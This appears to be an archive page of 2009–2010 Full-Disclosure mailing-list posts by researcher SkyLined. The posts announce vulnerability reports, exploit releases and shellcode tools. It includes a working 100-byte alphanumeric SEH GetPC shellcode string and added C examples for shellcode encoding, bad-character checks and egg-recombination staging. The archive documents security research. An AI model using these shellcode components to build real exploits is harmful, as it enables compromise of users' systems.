[Full-disclosure] Bypassing Export address table Address Filter (EAF)

2010-11-22 Thread Berend-Jan Wever
Hey list,

If you're interested in a short analysis of Microsoft's new EAF
pseudo-mitigation
and how to bypass it, have a look here:

http://skypher.com/index.php/2010/11/17/bypassing-eaf/

Cheers,
SkyLined

Berend-Jan Wever 
Delft, The Netherlands
http://skypher.com/SkyLined
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Oracle Java OBJECT children property memory corruption

2010-10-13 Thread Berend-Jan Wever
Good afternoon,

Oracle has released a patch for a vulnerability in Java 6 that I reported to
them. If you like to know more, you can read about it here:
http://skypher.com/index.php/2010/10/13/issue-18-oracle-java-applet-childre/

Cheers,
SkyLined


Berend-Jan Wever 
Delft, The Netherlands
http://skypher.com/SkyLined

[Full-disclosure] Microsoft Windows Media Player memory corruption

2010-10-13 Thread Berend-Jan Wever
Good afternoon,

Microsoft has released a patch for a vulnerability in Windows Media Player
plugin that I reported to them. If you like to know more, you can read about
it here:
http://skypher.com/index.php/2010/10/12/issue-21-wmp-memory-corruption-using-popups/

Cheers,
SkyLined
Berend-Jan Wever 
Delft, The Netherlands
http://skypher.com/SkyLined

Re: [Full-disclosure] Gödel and kernel backdoors

2010-09-19 Thread Berend-Jan Wever
nevermind the fact that a "good" program in your list may contain as yet
unknown vulnerabilities which mean it's actually bad.
On Sep 19, 2010 7:08 PM, "Georgi Guninski"  wrote:
> On Sun, Sep 19, 2010 at 06:21:35PM +0200, Pavel Kankovsky wrote:
>> On the other hand, It is possible to "detect all bad programs" if it is
>> allowed to err on the safe side and mistake some good programs for bad
>> programs. An extreme example is to call all programs bad unless their
>> exact code appears on the list of known good programs.
>>
>
>
> i doubt this can be remotely implemented in practice because of dynamic
code like |eval| and mobile code.
>
> can |code| be realistically distinguished from |data| for current OSes
> (e.g. is a vim modeline *only a* plain string or a string + program) ?
>
>
>

[Full-disclosure] Issue 17 - Msxml2.XMLHTTP.3.0 response handling memory corruption (ms10-051, CVE-2010-2561)

2010-08-10 Thread Berend-Jan Wever
Just facts, no marketing (sorry Alex :P).

Microsoft advisory:
http://www.microsoft.com/technet/security/bulletin/ms10-051.mspx
Blog post/discussion: http://skypher.com/index.php/2010/08/10/ms10-051/
Timeline, details and repro: http://code.google.com/p/skylined/issues/detail?id=17

Cheers,
SkyLined
Berend-Jan Wever 
http://skypher.com/SkyLined

Re: [Full-disclosure] Wordpad Command line argument vulnerability is it known ?

2010-03-18 Thread Berend-Jan Wever
This is very probably known and fixed, as I published about the many BoFs
and formatstring vulns in command line handling in Windows applications in
2004 (http://seclists.org/bugtraq/2004/Oct/45), after which most if not all
of them got fixed. I cannot reproduce in XP sp3.

If you still want to exploit it, why don't you encode your shellcode to
lowercase alphanumeric using ALPHA3?
http://code.google.com/p/alpha3/



Berend-Jan Wever 
http://skypher.com/SkyLined



On Wed, Mar 17, 2010 at 3:20 PM, sachin shinde wrote:

> hi,
>
>
> There is classic buffer/Stack overflow in wordpad.exe testing on winxp
> sp 2.(is it already known?)
>
> on text console wordpad.exe takes argument as a filename and there it
> happens.
>
> but writing shellcode for it is very hard,Because wordpad changes
> uppercase chars to  lower case chars. if anyone any idea about this
> please reply!
>
> Though it looks like local vulnerability we can trigger it remotely
> with ActiveX and Javascript.I can give full demonstration but cant
> write shellcode because of too many bad characters( of course can show
> you int 3 (0xcc)) but would like 2 show the full proof of concept
> demonstration.
>
>
> Regards,
>

[Full-disclosure] To Ryan Naraine

2010-03-03 Thread Berend-Jan Wever
(If you are not Ryan Naraine, you can stop reading now - sorry for the
noize).

Hey Ryan,

I've tried to contact you through the link on
http://blogs.zdnet.com/security/?p=5573 about the contents of that post, but
I have not heard from you. There are some factual errors in that post that I
thought you may want to correct, otherwise people might get the impression
that you do not know what you're talking about or are trying to make a big
story out of the release of a 5 year old exploit. I assume you missed my
previous email that expanded on my original post to fix these
misunderstandings, so if you read this, send me an email and I'll get you up
to speed.

Cheers and thanks,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined

Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP

2010-03-01 Thread Berend-Jan Wever
It seems my English is not as good as I thought and I accidentally led Ryan
Naraine <http://blogs.zdnet.com/security/?p=5573>, Larry Seltzer
<http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/#comments>
and probably others to come to conclusions such as that I released a
weaponized 0-day that bypasses both ASLR+DEP in current versions of MSIE and
Windows using a completely new technique and that I did so as a Google
employee.

However, let me try to explain better and to correct any ambiguity I may
have created in my first blog post:
- I have recently released an exploit that I developed in 2005 (before I was
employed by either MS or Google).
- I am releasing this as an individual as part of my new-years resolution
<http://skypher.com/index.php/2010/01/02/new-years-resolutions/> to dump
random stuff from my harddisk onto the tubes. (I have a personal interest in
security outside of my work, every now and then I find enough time to work on
and release stuff like this).
- The exploit targets a bug that was fixed in 2005
<http://skypher.com/wiki/index.php?title=Www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php>,
that only affected MSIE 6.0 and earlier.
- The exploit shows how to implement the well known ret-into-libc technique
(using a heap spray) to bypass DEP.

- The exploit does not contain anything that is not already public, other
than how to implement a ret-into-libc using a heap-spray to exploit complex
memory corruption bugs such as the DHTML race condition it targets.
- The exploit does not bypass ASLR.
- Using ret-into-libc to bypass DEP affects any application that has a
vulnerability that allows an attacker to use a ret-into-libc attack - this
is not MSIE specific.

I hope this helps clarify some things. But, not being a native English
speaker, I may inadvertently have said things completely wrong again. I look
forward to correcting my mistakes as they show up on other news sites in the
future.

Cheers,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined



On Mon, Mar 1, 2010 at 4:51 PM, Berend-Jan Wever
wrote:

> Hey all,
>
> I released a version of my Internet Exploiter 2 exploit from 2005 that
> bypasses DEP. If you are familiar with my Internet Exploiter series of
> exploits and/or are interested in how to use heap-spraying to bypass DEP,
> you may like this:
> http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/
>
> Cheers,
> SkyLined
> Berend-Jan Wever 
> http://skypher.com/SkyLined
>
>

[Full-disclosure] Internet Exploiter 2 - bypassing DEP

2010-03-01 Thread Berend-Jan Wever
Hey all,

I released a version of my Internet Exploiter 2 exploit from 2005 that
bypasses DEP. If you are familiar with my Internet Exploiter series of
exploits and/or are interested in how to use heap-spraying to bypass DEP,
you may like this:
http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/

Cheers,
SkyLined
Berend-Jan Wever 
http://skypher.com/SkyLined

[Full-disclosure] Google offers up to $1337 for select Chromium vulnerabilities

2010-01-29 Thread Berend-Jan Wever
http://blog.chromium.org/2010/01/encouraging-more-chromium-security.html


*"Today, we are introducing an experimental new incentive for external
researchers to participate. We will be rewarding select interesting and
original vulnerabilities reported to us by the security research community.
For existing contributors to Chromium security — who would likely continue
to contribute regardless — this may be seen as a token of our appreciation.
In addition, we are hoping that the introduction of this program will
encourage new individuals to participate in Chromium security. The more
people involved in scrutinizing Chromium's code and behavior, the more
secure our millions of users will be.

Such a concept is not new; we'd like to give serious kudos to the folks at
Mozilla for their long-running and successful vulnerability reward program.

Any bug filed through the Chromium bug tracker (under the template "Security
Bug") will qualify for consideration."*


Note that this does not mean that *all* bugs reported as vulnerabilities
get rewarded:


*"Q) What bugs are eligible?
A) Any security bug may be considered. We will typically focus on High and
Critical impact bugs <http://dev.chromium.org/developers/severity-guidelines>,
but any clever vulnerability at any severity might get a reward.
Obviously, your bug won't be eligible if you worked on the code or review in
the area in question."*


Cheers,

SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined

Re: [Full-disclosure] ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update Remote Code Execution Vulnerability

2010-01-25 Thread Berend-Jan Wever
How about rebranding to ZID, as in Zero Information Disclosures?


Berend-Jan Wever 
http://skypher.com/SkyLined



On Thu, Jan 21, 2010 at 9:07 PM, ZDI Disclosures <
zdi-disclosu...@tippingpoint.com> wrote:

> ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update
> Remote Code Execution Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-10-011
> January 21, 2010
>
> -- CVE ID:
> CVE-2010-0244
>
> -- Affected Vendors:
> Microsoft
>
> -- Affected Products:
> Microsoft Internet Explorer
>
> -- Vulnerability Details:
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of Microsoft Internet Explorer. User
> interaction is required to exploit this vulnerability in that the target
> must visit a malicious page.
>
> The specific flaw exists when a Col element is used within an HTML table
> container. If this element is removed while the table is in use a cache
> that exists of the table's cells will be used after one of it's elements
> has been invalidated. This can lead to code execution under the context
> of the currently logged in user.
>
> -- Vendor Response:
> Microsoft has issued an update to correct this vulnerability. More
> details can be found at:
>
> http://www.microsoft.com/technet/security/Bulletin/MS10-jan.mspx
>
> -- Disclosure Timeline:
> 2009-07-14 - Vulnerability reported to vendor
> 2010-01-21 - Coordinated public release of advisory
>
> -- Credit:
> This vulnerability was discovered by:
>* wushi of team509
>
> -- About the Zero Day Initiative (ZDI):
> Established by TippingPoint, The Zero Day Initiative (ZDI) represents
> a best-of-breed model for rewarding security researchers for responsibly
> disclosing discovered vulnerabilities.
>
> Researchers interested in getting paid for their security research
> through the ZDI can find more information and sign-up at:
>
>http://www.zerodayinitiative.com
>
> The ZDI is unique in how the acquired vulnerability information is
> used. TippingPoint does not re-sell the vulnerability details or any
> exploit code. Instead, upon notifying the affected product vendor,
> TippingPoint provides its customers with zero day protection through
> its intrusion prevention technology. Explicit details regarding the
> specifics of the vulnerability are not exposed to any parties until
> an official vendor patch is publicly available. Furthermore, with the
> altruistic aim of helping to secure a broader user base, TippingPoint
> provides this vulnerability information confidentially to security
> vendors (including competitors) who have a vulnerability protection or
> mitigation product.
>
> Our vulnerability disclosure policy is available online at:
>
>http://www.zerodayinitiative.com/advisories/disclosure_policy/

[Full-disclosure] Two MSIE 6.0/7.0 NULL pointer crashes

2010-01-20 Thread Berend-Jan Wever
Two NULL pointer crashes, they do not affect MSIE 8.0. Repros can be found
here:
http://skypher.com/index.php/2010/01/20/microsoft-internet-explorer-6-07-0-null-pointer-crashes/

Cheers,
SkyLined
Berend-Jan Wever 
http://skypher.com/SkyLined

[Full-disclosure] Download and LoadLibrary shellcode released

2010-01-11 Thread Berend-Jan Wever
For those interested in shellcode: download and LoadLibrary shellcode has
some benefits over download & execute shellcode. Read more about it here:
http://skypher.com/index.php/2010/01/11/download-and-loadlibrary-shellcode-released/

Cheers,

SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined

[Full-disclosure] Testival released

2010-01-11 Thread Berend-Jan Wever
During shellcode development, it makes sense to have a program that can
easily load your shellcode at a controllable location, allows you to set
registers and memory to certain values and execute the shellcode by setting
EIP through a RET or CALL instruction.

The Testival <http://code.google.com/p/testival/> project aims to do all
those things and more: it also allows you to test ret-into-libc attacks, set
the type of memory allocation you want (RWE flags, etc…), report exceptions
in your code to stdout as well as load DLLs to test shellcode in DllMain.

Testival is used by ALPHA3 <http://code.google.com/p/alpha3/> for
automatically testing if all the en-/decoders work.

Testival requires SkyBuild <http://code.google.com/p/skybuild/> to
automatically build all files.

Cheers,

SkyLined
Berend-Jan Wever 
http://skypher.com/SkyLined

[Full-disclosure] ALPHA3 released

2010-01-10 Thread Berend-Jan Wever
ALPHA3 <http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA3>,
an alphanumeric shellcode encoder, has been released:

Improvements from ALPHA2
<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2> to
ALPHA3:
- Smaller decoder stubs
<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/IMUL_0x30_encoding>.
- x64 support
<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/x64_printable_opcodes>
(mixedcase ascii only).
- x86 lowercase ascii support
<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/x86_printable_opcodes>.
- latin-1 CALL GetPC <http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC>
- x86 mixedcase ascii Countslide GetPC implementation
<http://skypher.com/index.php/2010/01/02/countslide-alphanumeric-getpc/>
- x86 mixedcase ascii SEH GetPC for XPSP3 (bypass all SafeSEH mitigations)
<http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC>
- More decoders for more types of base address sources.

Blog post:
http://skypher.com/index.php/2010/01/10/alpha3-released/

Project homepage:
http://code.google.com/p/alpha3/

Download:
http://alpha3.googlecode.com/files/ALPHA3.zip

Cheers,
SkyLined
Berend-Jan Wever 
http://skypher.com/SkyLined

[Full-disclosure] Countslide alphanumeric GetPC

2010-01-02 Thread Berend-Jan Wever
One limitation of most alphanumeric shellcode decoders, including those in
*ALPHA2* <http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2>
and the soon-to-be-released
*ALPHA3* <http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA3>
is that they need to know where they are located in memory in order to
decode themselves and run correctly. This makes using a *nopslide* hard in
most circumstances, because you mostly only need a *nopslide* if you do not
know exactly where your shellcode is in memory to begin with.

I've developed a way to get around this problem, which I've described in
more detail here:
http://skypher.com/index.php/2010/01/02/countslide-alphanumeric-getpc/

ALPHA3 has support for generating working alphanumeric shellcode with
nopslides using this technique. I'm currently working on getting the rest of
its code into releasable shape.

Cheers,
SkyLined
Berend-Jan Wever 
http://skypher.com/SkyLined

[Full-disclosure] BETA3 released

2010-01-02 Thread Berend-Jan Wever
Happy New Year!

As part of my New Year's resolutions
<http://skypher.com/index.php/2010/01/02/new-years-resolutions/>, I am
releasing some tools that I never got around to finish and/or publish.
First on the list is BETA3 <http://code.google.com/p/beta3/>, a multi-format
shellcode encoding tool that can convert raw binary shellcode into text that
can be used in exploit source-code. It can convert raw binary data to a
large number of encodings. It can also do the reverse: decode encoded data
into binary for the same types of encodings. This is the follow-up to
BETA2 <http://www.milw0rm.com/exploits/656>.

http://skypher.com/index.php/2010/01/02/beta3-released/

Cheers,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined
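Added example (written for this page; not BETA3's own source): two of the text encodings exploit source code commonly uses for raw shellcode, the C-style "\xNN" string form and the JavaScript unescape() "%uXXXX" form, plus a decoder for the latter. The %u layout (two bytes per unit, little-endian, odd trailing byte padded with a caller-supplied NOP) is an assumption about how such a converter would work, not a statement about BETA3's formats; the 5-byte sample is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Encode raw bytes as the body of a C/JS string literal: "\xNN\xNN...".
 * Returns the number of characters written (excluding NUL), 0 if out is too small. */
static size_t encode_hex_escape(const uint8_t *in, size_t len, char *out, size_t cap) {
    if (cap < len * 4 + 1) return 0;
    for (size_t i = 0; i < len; i++)
        sprintf(out + i * 4, "\\x%02x", in[i]);
    return len * 4;
}

/* Encode raw bytes as JavaScript unescape() "%uXXXX" units. Each unit is a
 * little-endian 16-bit value, so bytes b0 b1 become %u<b1><b0>. An odd trailing
 * byte is padded with `pad` (assumed: a NOP) so the decoded stream stays whole. */
static size_t encode_unicode_escape(const uint8_t *in, size_t len, uint8_t pad,
                                    char *out, size_t cap) {
    size_t units = (len + 1) / 2;
    if (cap < units * 6 + 1) return 0;
    for (size_t u = 0; u < units; u++) {
        uint8_t lo = in[2 * u];
        uint8_t hi = (2 * u + 1 < len) ? in[2 * u + 1] : pad;
        sprintf(out + u * 6, "%%u%02X%02X", hi, lo);
    }
    return units * 6;
}

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode "%uXXXX%uXXXX..." back to bytes (the reverse direction BETA3 also
 * offers). Returns the byte count, or 0 on malformed input or a too-small buffer. */
static size_t decode_unicode_escape(const char *in, uint8_t *out, size_t cap) {
    size_t n = 0;
    for (const char *p = in; *p; p += 6) {
        if (p[0] != '%' || p[1] != 'u') return 0;
        int h[4];
        for (int i = 0; i < 4; i++)
            if ((h[i] = hexval(p[2 + i])) < 0) return 0;   /* also catches a truncated unit */
        if (n + 2 > cap) return 0;
        out[n++] = (uint8_t)(h[2] * 16 + h[3]);   /* low byte comes first in memory */
        out[n++] = (uint8_t)(h[0] * 16 + h[1]);
    }
    return n;
}

/* Constructed 5-byte sample: odd length, so the %u form needs one pad byte. */
static const uint8_t SAMPLE[] = { 0xFC, 0xE8, 0x82, 0x00, 0x00 };

static const char *sample_unicode(void) {
    static char buf[64];
    return encode_unicode_escape(SAMPLE, sizeof SAMPLE, 0x90, buf, sizeof buf) ? buf : "";
}

static const char *sample_hex(void) {
    static char buf[64];
    return encode_hex_escape(SAMPLE, sizeof SAMPLE, buf, sizeof buf) ? buf : "";
}

/* Round trip: decoded length is the padded length, prefix equals SAMPLE, last byte is the pad. */
static int sample_roundtrip_ok(void) {
    uint8_t back[16];
    size_t n = decode_unicode_escape(sample_unicode(), back, sizeof back);
    return n == sizeof SAMPLE + 1 && memcmp(back, SAMPLE, sizeof SAMPLE) == 0 && back[n - 1] == 0x90;
}

int main(void) {
    printf("hex escape : \"%s\"\n", sample_hex());
    printf("%%u escape  : \"%s\"\n", sample_unicode());
    printf("round trip : %s\n", sample_roundtrip_ok() ? "ok" : "FAIL");
    return 0;
}
```

The pad byte matters: unescape() produces 16-bit units, so a shellcode of odd length cannot be represented without adding a byte, and the added byte lands after the shellcode where it must be harmless (hence a NOP by default).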

[Full-disclosure] MSIE Content-Encoding: deflate memory corruption vulnerability

2009-10-13 Thread Berend-Jan Wever
Microsoft bulletin:
http://www.microsoft.com/technet/security/bulletin/MS09-054.mspx

Short description and repro information:
http://skypher.com/index.php/2009/10/13/ms09-054cve-2009-1547-data-stream-header-corruption-vulnerability/

Cheers,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined

[Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread Berend-Jan Wever
Adobe bulletin:
http://www.adobe.com/support/security/bulletins/apsb09-15.html

Short description and repro case:
http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/
Cheers,

SkyLined
Berend-Jan Wever 
http://skypher.com/SkyLined

Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8

2009-10-01 Thread Berend-Jan Wever
FYI: ASLR & DEP can be bypassed on x86, there's just nothing public at the
moment.

Cheers,

SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined




On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious wrote:

> Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no
> DEP/ASLR there... But as you said, so far there's no known "catch-all"
> technique against IE8.
> Along with other security features (
> http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx)
> this basically means that IE8 is the most secure web browser nowadays?
>
> On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott wrote:
>
>> I'm not aware of any catch-all technique just for IE8, though there are
>> a few common ones like return oriented programming.  Application
>> specific techniques are also common when third party extensions are
>> involved.
>>
>> --
>> __
>> Jared D. DeMott
>> Principal Security Researcher
>>
>>
>
>
> --
> Best wishes,
> Freddie Vicious
> http://twitter.com/viciousf
>

[Full-disclosure] Alphanumeric ASCII SEH GetPC for XP up to sp3

2009-06-12 Thread Berend-Jan Wever
Hi all,

I have released an updated version of my alphanumeric ASCII SEH GetPC code
which works on Windows XP up to and including sp3:
http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA3/x86/ASCII/Mixedcase/SEH_GetPC_(XP_sp3)
It bypasses the mitigations that stopped my previous SEH GetPC by generating
the SEH handler on the heap rather than the stack.
NB. It still requires that the process is running with hardware DEP disabled
or that you find a way to make the heap memory executable.

This is the compiled code (100 bytes):
V34djPXP4Hd30V3v034dYV34014dZX4vP4v4PHPfh11DX5PRRRV34dNj334d3D241D24XXfX3D28f1D28jAXLX3Dqh3Tpl1Tpl96

Quick intro to GetPC code:
http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC

Thanks,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined
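Added check, not code from ALPHA3 or from the post above: the first thing to do with an alphanumeric stub is to confirm it really stays inside the byte set the target leaves untouched. This runs the 100-byte SEH GetPC stub quoted above through a mixedcase and a lowercase filter, and models the WordPad case earlier in this archive, where the target lowercases its argument before the overflow, so mixedcase code would be corrupted. The 4-byte raw stub is constructed for contrast.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Byte classes a target is known to pass through unmodified. */
enum charset { CS_MIXEDCASE_ALNUM, CS_LOWERCASE_ALNUM, CS_UPPERCASE_ALNUM };

static int byte_allowed(unsigned char c, enum charset cs) {
    int digit = c >= '0' && c <= '9';
    int lower = c >= 'a' && c <= 'z';
    int upper = c >= 'A' && c <= 'Z';
    switch (cs) {
    case CS_LOWERCASE_ALNUM: return digit || lower;
    case CS_UPPERCASE_ALNUM: return digit || upper;
    default:                 return digit || lower || upper;
    }
}

/* Offset of the first byte of code[0..len) outside the charset, or -1 if all pass. */
static long first_bad_byte(const unsigned char *code, size_t len, enum charset cs) {
    for (size_t i = 0; i < len; i++)
        if (!byte_allowed(code[i], cs)) return (long)i;
    return -1;
}

/* Model of the WordPad behaviour reported in the thread: the target lowercases
 * its input before the overflow. Returns 1 if the code reaches memory unchanged. */
static int survives_lowercasing(const unsigned char *code, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (code[i] >= 'A' && code[i] <= 'Z') return 0;
    return 1;
}

/* The 100-byte mixedcase ASCII SEH GetPC stub quoted in the post above. */
static const char SEH_GETPC_XPSP3[] =
    "V34djPXP4Hd30V3v034dYV34014dZX4vP4v4PHPfh11DX5PRRRV34dNj334d3D241D24XXfX3D28f1D28jAXLX3Dqh3Tpl1Tpl96";

/* Constructed raw (unencoded) stub: 0x31 happens to be '1' and passes, 0xC0 does not. */
static const unsigned char RAW_STUB[] = { 0x31, 0xC0, 0x50, 0x68 };

static size_t getpc_len(void) { return strlen(SEH_GETPC_XPSP3); }

static long getpc_first_bad(enum charset cs) {
    return first_bad_byte((const unsigned char *)SEH_GETPC_XPSP3, getpc_len(), cs);
}

static long raw_first_bad(void) {
    return first_bad_byte(RAW_STUB, sizeof RAW_STUB, CS_MIXEDCASE_ALNUM);
}

static int getpc_survives_lowercasing(void) {
    return survives_lowercasing((const unsigned char *)SEH_GETPC_XPSP3, getpc_len());
}

int main(void) {
    printf("stub length            : %zu\n", getpc_len());
    printf("mixedcase, first bad   : %ld\n", getpc_first_bad(CS_MIXEDCASE_ALNUM));
    printf("lowercase, first bad   : %ld\n", getpc_first_bad(CS_LOWERCASE_ALNUM));
    printf("raw stub, first bad    : %ld\n", raw_first_bad());
    printf("survives tolower()     : %d\n", getpc_survives_lowercasing());
    return 0;
}
```

A stub that passes the mixedcase filter but not the lowercase one (as this GetPC does, failing at offset 0 on 'V') is exactly the case where a lowercase encoder is needed rather than a mixedcase one.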

[Full-disclosure] MS09-014: MSIE EMBED element race condition memory corruption

2009-04-19 Thread Berend-Jan Wever
Some details + repro:
http://skypher.com/index.php/2009/04/19/ms09-014-embed-element-memory-corruption/
Cheers,

SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined

Re: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit

2009-04-04 Thread Berend-Jan Wever
...sigh

This is https://bugzilla.mozilla.org/show_bug.cgi?id=456727, which I
reported to Mozilla in September of 2009. It is a NULL ptr DoS, there is no
"exploit" in the sense of executing arbitrary code, just a "repro" that can
trigger a crash. The repro provided by Carl is the exact same repro I
provided to Mozilla.

Incidentally, Carl has reported this exact same bug before:
http://seclists.org/fulldisclosure/2009/Jan/0219.html. This is how the repro
got on milw0rm in the first place (http://milw0rm.com/exploits/8091). Aditya
K Sood later submitted the repro (slightly modified) to milw0rm as his code
as well (http://milw0rm.com/exploits/8219).

Some say plagiarism is the sincerest form of flattery, so I guess I'll start
obfuscating my repros into ASCII art that says "SkyLined" to prevent any
more people from flattering me.

Cheers,
Sky


Berend-Jan Wever 
http://skypher.com/SkyLined




On Sat, Apr 4, 2009 at 2:39 PM, carl hardwick wrote:

> I found an unpatched vulnerability in the latest Firefox 3.0.8 allows
> a remote attacker to cause a DoS.
> A 0-day exploit is available here:
>
> http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjws1umYfXMbeoe6wr8IrMRRv
>

[Full-disclosure] w32 SEH omelet shellcode stage

2009-03-16 Thread Berend-Jan Wever
Hey all,

I'm releasing some code for a technique which I call "omelet shellcode" that
may be useful in some exploits. It is similar to egg-hunt shellcode, but
will search user-land address space for multiple smaller eggs and recombine
them into one larger block of shellcode and execute it. This is useful in
situation where you cannot inject a block of sufficient size into a target
process to store your shellcode in one piece, but you can inject multiple
smaller blocks and execute one of them.

More details can be found here:
http://skypher.com/wiki/index.php?title=Shellcode/w32_SEH_omelet_shellcode
http://code.google.com/p/w32-seh-omelet-shellcode/
I have not had a chance to test this newer version in a live exploit, so do
let me know if you have a chance to use it.


Cheers,
SkyLined


Berend-Jan Wever 
   http://skypher.com/SkyLined
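Added example of the recombination step the post describes, written for this page; it is not the w32 SEH omelet code and uses a hypothetical egg layout (4-byte marker, egg index, egg count, payload length, payload) chosen for illustration. The "memory" is a constructed 512-byte filler region with three eggs planted out of order, and a second run destroys one egg to show that a missing piece must fail the search rather than yield a truncated payload.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical egg layout for this demonstration (NOT the layout used by the
 * w32 SEH omelet shellcode):
 *   4-byte marker | 1-byte egg index | 1-byte egg count | 1-byte payload length | payload */
#define EGG_MARKER  "w32o"
#define EGG_HDR_LEN 7

/* Split payload[0..len) into eggs of at most `chunk` bytes and write them into
 * mem at the given offsets (one per egg). Returns the number of eggs written,
 * or 0 if the payload does not fit the scheme or the region. */
static size_t omelet_plant(uint8_t *mem, size_t memlen, const uint8_t *payload,
                           size_t len, size_t chunk, const size_t *offsets,
                           size_t noffsets) {
    size_t count = chunk ? (len + chunk - 1) / chunk : 0;
    if (count == 0 || count > 255 || chunk > 255 || noffsets < count) return 0;
    for (size_t i = 0; i < count; i++) {
        size_t plen = (i + 1 < count) ? chunk : len - i * chunk;
        size_t off = offsets[i];
        if (off + EGG_HDR_LEN + plen > memlen) return 0;
        memcpy(mem + off, EGG_MARKER, 4);
        mem[off + 4] = (uint8_t)i;
        mem[off + 5] = (uint8_t)count;
        mem[off + 6] = (uint8_t)plen;
        memcpy(mem + off + EGG_HDR_LEN, payload + i * chunk, plen);
    }
    return count;
}

/* The omelet stage proper: scan mem[0..memlen) for eggs, then recombine them in
 * index order into out. Eggs may lie anywhere, in any order. Returns the
 * reassembled length, or 0 if an egg is missing or out is too small. */
static size_t omelet_search(const uint8_t *mem, size_t memlen, uint8_t *out, size_t outcap) {
    const uint8_t *egg[256] = { 0 };
    int count = -1;
    for (size_t off = 0; off + EGG_HDR_LEN <= memlen; off++) {
        if (memcmp(mem + off, EGG_MARKER, 4) != 0) continue;
        uint8_t idx = mem[off + 4], n = mem[off + 5], plen = mem[off + 6];
        /* A marker that occurs by chance in other data usually fails these checks. */
        if (n == 0 || idx >= n || off + EGG_HDR_LEN + plen > memlen) continue;
        if (count == -1) count = n;
        else if (count != n) continue;               /* egg from a different omelet */
        if (egg[idx] == NULL) egg[idx] = mem + off;  /* keep the first copy found */
    }
    if (count <= 0) return 0;
    size_t total = 0;
    for (int i = 0; i < count; i++) {
        if (egg[i] == NULL) return 0;                /* missing egg: never run a partial payload */
        uint8_t plen = egg[i][6];
        if (total + plen > outcap) return 0;
        memcpy(out + total, egg[i] + EGG_HDR_LEN, plen);
        total += plen;
    }
    return total;
}

/* Constructed scenario: 34 payload bytes in eggs of 16, with egg 0 placed
 * highest in memory so discovery order differs from index order. */
static const uint8_t PAYLOAD[] = "constructed-sample-shellcode-bytes";
static const size_t  OFFSETS[] = { 300, 40, 170 };

static int omelet_demo(void) {
    uint8_t mem[512], out[64];
    memset(mem, 0x90, sizeof mem);
    size_t len = sizeof PAYLOAD - 1;
    if (omelet_plant(mem, sizeof mem, PAYLOAD, len, 16, OFFSETS, 3) != 3) return 0;
    size_t got = omelet_search(mem, sizeof mem, out, sizeof out);
    return got == len && memcmp(out, PAYLOAD, len) == 0;
}

/* Same scenario with the marker of egg 2 overwritten: the search must fail
 * instead of handing back 32 of 34 bytes. */
static int omelet_demo_missing_egg(void) {
    uint8_t mem[512], out[64];
    memset(mem, 0x90, sizeof mem);
    size_t len = sizeof PAYLOAD - 1;
    if (omelet_plant(mem, sizeof mem, PAYLOAD, len, 16, OFFSETS, 3) != 3) return 0;
    memset(mem + OFFSETS[2], 0x90, 4);
    return omelet_search(mem, sizeof mem, out, sizeof out) == 0;
}

int main(void) {
    printf("omelet recombine     : %s\n", omelet_demo() ? "ok" : "FAIL");
    printf("missing egg detected : %s\n", omelet_demo_missing_egg() ? "ok" : "FAIL");
    return 0;
}
```

In a real stage the scan runs over user-land address space rather than a local buffer and has to survive unmapped pages (the SEH in the name of the original project is how it handles the resulting access violations); that part is deliberately not modelled here.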

Re: [Full-disclosure] Firefox 3.0.5 remote vulnerability via queryCommandState

2009-01-07 Thread Berend-Jan Wever
Sorry, something went wrong while copy+pasting the repro URL:
